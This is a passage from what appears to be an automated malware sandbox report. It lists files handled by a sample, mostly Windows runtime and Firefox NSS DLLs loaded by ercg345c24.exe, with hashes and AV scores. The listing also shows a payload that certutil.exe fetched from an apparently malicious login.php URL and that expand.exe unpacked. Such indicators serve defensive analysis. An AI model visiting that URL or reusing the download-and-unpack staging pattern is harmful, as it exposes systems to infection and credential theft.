- SHA1
- f5a4eb3d8ac8fb68af716857629a43cd6be63473
- SHA256
- 8eb5270fa99069709c846db38be743a1a80a42aa1a88776131f79e1d07cc411c
-
api-ms-win-core-synch-l1-1-0.dll
- Size
- 20KiB (20280 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 71af7ed2a72267aaad8564524903cff6
- SHA1
- 8a8437123de5a22ab843adc24a01ac06f48db0d3
- SHA256
- 5dd4ccd63e6ed07ca3987ab5634ca4207d69c47c2544dfefc41935617652820f
-
api-ms-win-core-sysinfo-l1-1-0.dll
- Size
- 19KiB (19248 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 19a40af040bd7add901aa967600259d9
- SHA1
- 05b6322979b0b67526ae5cd6e820596cbe7393e4
- SHA256
- 4b704b36e1672ae02e697efd1bf46f11b42d776550ba34a90cd189f6c5c61f92
-
api-ms-win-core-util-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 0f079489abd2b16751ceb7447512a70d
- SHA1
- 679dd712ed1c46fbd9bc8615598da585d94d5d87
- SHA256
- f7d450a0f59151bcefb98d20fcae35f76029df57138002db5651d1b6a33adc86
-
api-ms-win-crt-convert-l1-1-0.dll
- Size
- 22KiB (22328 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 72e28c902cd947f9a3425b19ac5a64bd
- SHA1
- 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
- SHA256
- 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
-
api-ms-win-crt-environment-l1-1-0.dll
- Size
- 18KiB (18736 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- ac290dad7cb4ca2d93516580452eda1c
- SHA1
- fa949453557d0049d723f9615e4f390010520eda
- SHA256
- c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
-
api-ms-win-crt-multibyte-l1-1-0.dll
- Size
- 26KiB (26424 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 35fc66bd813d0f126883e695664e7b83
- SHA1
- 2fd63c18cc5dc4defc7ea82f421050e668f68548
- SHA256
- 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
-
api-ms-win-crt-private-l1-1-0.dll
- Size
- 71KiB (73016 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 9910a1bfdc41c5b39f6af37f0a22aacd
- SHA1
- 47fa76778556f34a5e7910c816c78835109e4050
- SHA256
- 65ded8d2ce159b2f5569f55b2caf0e2c90f3694bd88c89de790a15a49d8386b9
-
api-ms-win-crt-stdio-l1-1-0.dll
- Size
- 24KiB (24368 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- fefb98394cb9ef4368da798deab00e21
- SHA1
- 316d86926b558c9f3f6133739c1a8477b9e60740
- SHA256
- b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
-
api-ms-win-crt-string-l1-1-0.dll
- Size
- 23KiB (23488 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 404604cd100a1e60dfdaf6ecf5ba14c0
- SHA1
- 58469835ab4b916927b3cabf54aee4f380ff6748
- SHA256
- 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
-
api-ms-win-crt-time-l1-1-0.dll
- Size
- 20KiB (20792 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 849f2c3ebf1fcba33d16153692d5810f
- SHA1
- 1f8eda52d31512ebfdd546be60990b95c8e28bfb
- SHA256
- 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
-
api-ms-win-crt-utility-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- b52a0ca52c9c207874639b62b6082242
- SHA1
- 6fb845d6a82102ff74bd35f42a2844d8c450413b
- SHA256
- a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
-
freebl3.dll
- Size
- 325KiB (332752 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 343aa83574577727aabe537dccfdeafc
- SHA1
- 9ce3b9a182429c0dba9821e2e72d3ab46f5d0a06
- SHA256
- 393ae7f06fe6cd19ea6d57a93dd0acd839ee39ba386cf1ca774c4c59a3bfebd8
-
msvcp140.dll
- Size
- 430KiB (440120 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/66
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 109f0f02fd37c84bfc7508d4227d7ed5
- SHA1
- ef7420141bb15ac334d3964082361a460bfdb975
- SHA256
- 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
-
api-ms-win-core-file-l1-2-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- e2f648ae40d234a3892e1455b4dbbe05
- SHA1
- d9d750e828b629cfb7b402a3442947545d8d781b
- SHA256
- c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
-
api-ms-win-core-processthreads-l1-1-1.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d0289835d97d103bad0dd7b9637538a1
- SHA1
- 8ceebe1e9abb0044808122557de8aab28ad14575
- SHA256
- 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
-
api-ms-win-core-timezone-l1-1-0.dll
- Size
- 18KiB (18224 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- babf80608fd68a09656871ec8597296c
- SHA1
- 33952578924b0376ca4ae6a10b8d4ed749d10688
- SHA256
- 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
-
-
Informative Selection 3
-
-
ercg345c24.cab
- Size
- 135KiB (138377 bytes)
- Type
- data
- Description
- Microsoft Cabinet archive data, 138377 bytes, 1 file
- Runtime Process
- expand.exe (PID: 2512)
- MD5
- 8140a9fa5dc6e4eab7f91ea58f2acfa3
- SHA1
- 457a9e48812f7dcef295e4ecc42c836331d2acb4
- SHA256
- c9a0756d5a70de7d414016b58bb02b3ce7f8428c748fde9ac57587df5ac167ab
-
ercg345c24.txt
- Size
- 186KiB (190328 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- certutil.exe (PID: 3948)
- MD5
- e921b9e8e7d0278f58f658e4968ed3c9
- SHA1
- 33f506cb208b1f379bfd7e00e869cf6429112528
- SHA256
- 23273702b85f6ef58f45429dd117bb55b4701bd078745d362feb3ff6b76918c6
-
urlref_httpwww.illumania.netlogin.php
- Size
- 186KiB (190328 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Context
- http://www.illumania.net/login.php
- MD5
- e921b9e8e7d0278f58f658e4968ed3c9
- SHA1
- 33f506cb208b1f379bfd7e00e869cf6429112528
- SHA256
- 23273702b85f6ef58f45429dd117bb55b4701bd078745d362feb3ff6b76918c6
-
-
Informative 29
-
-
login[1].htm
- Size
- 186KiB (190328 bytes)
- Runtime Process
- certutil.exe (PID: 3948)
- MD5
- e921b9e8e7d0278f58f658e4968ed3c9
- SHA1
- 33f506cb208b1f379bfd7e00e869cf6429112528
- SHA256
- 23273702b85f6ef58f45429dd117bb55b4701bd078745d362feb3ff6b76918c6
-
75FD879489CB57C12C7CF88E14EA37C5
- Size
- 186B (186 bytes)
- Runtime Process
- certutil.exe (PID: 3948)
- MD5
- ddc1cf6502fdcd4bab0363b84477f142
- SHA1
- aeccea7493d9707d217d833666d1180461764c73
- SHA256
- ed1fe96d7975c4b79311d89399658943d2618d2cb1d2192277b16185dca466ac
-
218f98763775034fb6c9e84dafefab70.tmp
- Size
- 204KiB (208384 bytes)
- Runtime Process
- expand.exe (PID: 2512)
- MD5
- e869be82922e2f3ae3ecba8e0501cb63
- SHA1
- 6bbc7639f25449cb36d5c974907da96d728a7069
- SHA256
- 5a26ee59d66a3e390ebc45a8c9c2a08196135c206fd9b43024bd27ef8e0c30b2
-
api-ms-win-core-console-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 502263c56f931df8440d7fd2fa7b7c00
- SHA1
- 523a3d7c3f4491e67fc710575d8e23314db2c1a2
- SHA256
- 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
-
api-ms-win-core-datetime-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- cb978304b79ef53962408c611dfb20f5
- SHA1
- eca42f7754fb0017e86d50d507674981f80bc0b9
- SHA256
- 90fae0e7c3644a6754833c42b0ac39b6f23859f9a7cf4b6c8624820f59b9dad3
-
api-ms-win-core-errorhandling-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6d778e83f74a4c7fe4c077dc279f6867
- SHA1
- f5d9cf848f79a57f690da9841c209b4837c2e6c3
- SHA256
- a97dcca76cdb12e985dff71040815f28508c655ab2b073512e386dd63f4da325
-
api-ms-win-core-heap-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 2ea3901d7b50bf6071ec8732371b821c
- SHA1
- e7be926f0f7d842271f7edc7a4989544f4477da7
- SHA256
- 44f6df4280c8ecc9c6e609b1a4bfee041332d337d84679cfe0d6678ce8f2998a
-
api-ms-win-core-interlocked-l1-1-0.dll
- Size
- 17KiB (17856 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d97a1cb141c6806f0101a5ed2673a63d
- SHA1
- d31a84c1499a9128a8f0efea4230fcfa6c9579be
- SHA256
- deccd75fc3fc2bb31338b6fe26deffbd7914c6cd6a907e76fd4931b7d141718c
-
api-ms-win-core-memory-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d500d9e24f33933956df0e26f087fd91
- SHA1
- 6c537678ab6cfd6f3ea0dc0f5abefd1c4924f0c0
- SHA256
- bb33a9e906a5863043753c44f6f8165afe4d5edb7e55efa4c7e6e1ed90778eca
-
api-ms-win-core-namedpipe-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6f6796d1278670cce6e2d85199623e27
- SHA1
- 8aa2155c3d3d5aa23f56cd0bc507255fc953ccc3
- SHA256
- c4f60f911068ab6d7f578d449ba7b5b9969f08fc683fd0ce8e2705bbf061f507
-
api-ms-win-core-rtlsupport-l1-1-0.dll
- Size
- 17KiB (17720 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- fdba0db0a1652d86cd471eaa509e56ea
- SHA1
- 3197cb45787d47bac80223e3e98851e48a122efa
- SHA256
- 2257fea1e71f7058439b3727ed68ef048bd91dcacd64762eb5c64a9d49df0b57
-
api-ms-win-core-string-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 12cc7d8017023ef04ebdd28ef9558305
- SHA1
- f859a66009d1caae88bf36b569b63e1fbdae9493
- SHA256
- 7670fdede524a485c13b11a7c878015e9b0d441b7d8eb15ca675ad6b9c9a7311
-
api-ms-win-crt-conio-l1-1-0.dll
- Size
- 19KiB (19256 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6ea692f862bdeb446e649e4b2893e36f
- SHA1
- 84fceae03d28ff1907048acee7eae7e45baaf2bd
- SHA256
- 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
-
api-ms-win-crt-filesystem-l1-1-0.dll
- Size
- 20KiB (20280 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- aec2268601470050e62cb8066dd41a59
- SHA1
- 363ed259905442c4e3b89901bfd8a43b96bf25e4
- SHA256
- 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
-
api-ms-win-crt-heap-l1-1-0.dll
- Size
- 19KiB (19256 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 93d3da06bf894f4fa21007bee06b5e7d
- SHA1
- 1e47230a7ebcfaf643087a1929a385e0d554ad15
- SHA256
- f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
-
api-ms-win-crt-locale-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- a2f2258c32e3ba9abf9e9e38ef7da8c9
- SHA1
- 116846ca871114b7c54148ab2d968f364da6142f
- SHA256
- 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
-
api-ms-win-crt-math-l1-1-0.dll
- Size
- 28KiB (28984 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 8b0ba750e7b15300482ce6c961a932f0
- SHA1
- 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
- SHA256
- bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
-
api-ms-win-crt-process-l1-1-0.dll
- Size
- 19KiB (19256 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 8d02dd4c29bd490e672d271700511371
- SHA1
- f3035a756e2e963764912c6b432e74615ae07011
- SHA256
- c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
-
api-ms-win-crt-runtime-l1-1-0.dll
- Size
- 22KiB (22840 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 41a348f9bedc8681fb30fa78e45edb24
- SHA1
- 66e76c0574a549f293323dd6f863a8a5b54f3f9b
- SHA256
- c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
-
mozglue.dll
- Size
- 136KiB (139216 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 9e682f1eb98a9d41468fc3e50f907635
- SHA1
- 85e0ceca36f657ddf6547aa0744f0855a27527ee
- SHA256
- 830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
-
nss3.dll
- Size
- 1.2MiB (1244112 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 556ea09421a0f74d31c4c0a89a70dc23
- SHA1
- f739ba9b548ee64b13eb434a3130406d23f836e3
- SHA256
- f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
-
nssdbm3.dll
- Size
- 90KiB (92624 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 569a7a65658a46f9412bdfa04f86e2b2
- SHA1
- 44cc0038e891ae73c43b61a71a46c97f98b1030d
- SHA256
- 541a293c450e609810279f121a5e9dfa4e924d52e8b0c6c543512b5026efe7ec
-
softokn3.dll
- Size
- 141KiB (144336 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 67827db2380b5848166a411bae9f0632
- SHA1
- f68f1096c5a3f7b90824aa0f7b9da372228363ff
- SHA256
- 9a7f11c212d61856dfc494de111911b7a6d9d5e9795b0b70bbbc998896f068ae
-
ucrtbase.dll
- Size
- 1.1MiB (1142072 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d6326267ae77655f312d2287903db4d3
- SHA1
- 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
- SHA256
- 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
-
vcruntime140.dll
- Size
- 82KiB (83784 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 7587bf9cb4147022cd5681b015183046
- SHA1
- f2106306a8f6f0da5afb7fc765cfa0757ad5a628
- SHA256
- c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
-
api-ms-win-core-file-l2-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- e479444bdd4ae4577fd32314a68f5d28
- SHA1
- 77edf9509a252e886d4da388bf9c9294d95498eb
- SHA256
- c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
-
api-ms-win-core-localization-l1-2-0.dll
- Size
- 20KiB (20792 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- eff11130bfe0d9c90c0026bf2fb219ae
- SHA1
- cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
- SHA256
- 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
-
api-ms-win-core-synch-l1-2-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 0d1aa99ed8069ba73cfd74b0fddc7b3a
- SHA1
- ba1f5384072df8af5743f81fd02c98773b5ed147
- SHA256
- 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
-
sort.exe
- Size
- 536KiB (548864 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
- 557f802cc4e781efa055dad5c817585e
- SHA1
- 4441defb9cb1be7a2b5d2d576ec92f6a98614754
- SHA256
- ebd84c2b5c26cb2c4c42a4cbe1bc57c001f72cd4130b6f83c0e100b98d84a221
-
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Not all IP/URL string resources were checked online
- Not all created files are visible for ercg345c24.exe (PID: 3852)
- Not all file accesses are visible for certutil.exe (PID: 3128)
- Not all file accesses are visible for certutil.exe (PID: 3948)
- Not all file accesses are visible for cmd.exe (PID: 1064)
- Not all file accesses are visible for cmd.exe (PID: 3180)
- Not all file accesses are visible for ercg345c24.exe (PID: 3852)
- Not all file accesses are visible for expand.exe (PID: 2512)
- Not all file accesses are visible for sort.exe (PID: 2260)
- Not all sources for indicator ID "api-4" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "binary-1" are available in the report
- Not all sources for indicator ID "binary-16" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "string-24" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Some low-level data is hidden, as this is only a slim report